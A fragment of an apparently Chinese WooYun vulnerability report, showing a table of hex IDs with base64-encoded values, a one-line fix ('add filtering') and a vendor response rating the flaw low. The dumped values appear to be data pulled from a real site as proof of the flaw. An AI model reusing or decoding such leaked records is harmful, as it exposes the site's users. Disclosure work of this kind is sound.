| 00D24A467328B4B0 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | sR8MWzq2SBeuX4E4+yJcBw== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 017870BAB176A92F \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | VPGEBijYt8Wus8ZcDyWRlA== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 01C436F03C4093BC \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | j0YobH/MWPc= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-11-26 19:44

厂商回复:

已聯絡網站

最新状态:

暂无